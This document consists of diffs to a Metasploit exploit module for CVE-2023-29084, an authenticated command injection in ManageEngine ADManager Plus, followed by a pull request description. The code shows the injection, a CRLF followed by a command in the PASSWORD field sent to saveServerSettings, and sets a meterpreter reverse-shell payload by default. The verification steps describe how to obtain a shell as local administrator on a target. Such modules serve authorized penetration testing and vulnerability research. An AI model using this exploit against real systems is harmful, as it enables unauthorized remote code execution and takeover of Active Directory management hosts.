-          into an string that is later used as a command to execute on the target system.
+          ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient
+          validation of user input when performing the ChangePasswordAction function before passing it into a string that is later
+          used as an OS command to execute.
 
-          By injecting into the USERNAME or PASSWORD fields of the request, an attacker can use this vulnerability
-          to execute code in the context of the user running ManageEngine ADManager Plus, which will typically be
-          the local administrator.
+          By making a POST request to /api/json/admin/saveServerSettings with a params POST
+          parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a
+          carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user
+          running ADManager Plus, which will typically be the local administrator.
+
+          Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,
+          so this vulnerability does require authentication to exploit.
         },
         'Author' => [
           'Simon Humbert', # Disclosure of bug via ZDI
@@ -33,8 +37,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2023-29084'],
           ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup
-          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'], # ZDI Advisory
           ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory
+          ['URL', 'https://www.manageengine.com/products/ad-manager/release-notes.html'] # Release Notes and Reporter Acknowledgement
         ],
         'DisclosureDate' => '2023-04-12',
         'License' => MSF_LICENSE,
@@ -66,9 +71,17 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The user to log into ADManager Plus as', 'admin']),
+        OptString.new('PASSWORD', [true, 'The password to log in with', 'admin']),
+        OptString.new('DOMAIN', [true, 'The domain to log into', 'ADManager Plus Authentication'])
+      ]
+    )
   end
 
-  def login(username, password)
+  def login(username, password, domain)
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'j_security_check'),
       'method' => 'POST',
@@ -79,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'is_admp_pass_encrypted' => 'false', # Optional but better to keep it in here to match normal request.
         'j_username' => username,
         'j_password' => password,
-        'domainName' => 'ADManager Plus Authentication',
+        'domainName' => domain,
         'AUTHRULE_NAME' => 'ADAuthenticator'
       },
       'keep_cookies' => true
@@ -136,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code!')
     end
 
-    login('admin', 'admin')
+    login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DOMAIN'])
 
     # We need to do this post login otherwise we will get errors. This also ensures we get updated
     # cookies post login as these can sometimes change post login process.

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } # cmd/windows/powershell_bind_tcp also works.
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
             }
           ],
         ],
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
         }
       )
     )
@@ -218,7 +218,7 @@ class MetasploitModule < Msf::Exploit::Remote
         SERVER_NAME: 'localhost',
         USER_NAME: Rex::Text.rand_text_alphanumeric(4..20).to_s,
         PASSWORD: "#{Rex::Text.rand_text_alphanumeric(4..20)}\r\n#{cmd}",
-        PORT: '8080'
+        PORT: datastore['RPORT']
       }
     ].to_json
   end

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -58,7 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
+              'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse bind none' } }
             }
           ],
         ],
@@ -240,7 +241,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if res.body&.match(/{"isAuthorized":false}/)
         fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!')
       elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)
-        print_warning("Settings successfully changed but the fact that the server responded likely means the payload didn't execute!")
+        print_warning("Settings successfully changed confirmation received before timeout occurred. Its possible the payload didn't execute!")
       elsif res.body&.match(/"status":"error"/)
         print_error("The payload somehow triggered an error on the target's side! Error was: #{res.body}")
       else
@@ -266,13 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ].to_json
   end
 
-  def create_params_value_restore(enable_proxy = nil)
-    if enable_proxy.blank?
-      @proxy_enabled = false
-    else
-      @proxy_enabled = true
-    end
-
+  def create_params_value_restore
     [
       {
         tabId: 'proxy',


### PR DESCRIPTION
Fixes #18000 

AdManager Plus prior to build 7181 allows authenticated users to exploit a command injection in the `USERNAME` or `PASSWORD` fields of the `params` parameter when making a POST request to `/api/json/admin/saveServerSettings`. This can be exploited to gain access to the host machine as the use running ADManager Plus, which will typically be the local administrator.

## Verification

1. Set up a Windows Server target as a domain controller server.
2. Download https://web.archive.org/web/20220926012908if_/https://download.manageengine.com/products/ad-manager/13024552/ManageEngine_ADManager_Plus_64.exe onto the target and run through the setup window, accepting defaults.
3. Start msfconsole and `use exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection`
4. `set RHOST *target IP*`
5. `set LHOST *local IP address*`
6. `set SRVHOST *local IP address*` <- This step is optional depending on payload.
7. `exploit`
8. You should get a shell back as the local administrator user on the target machine.
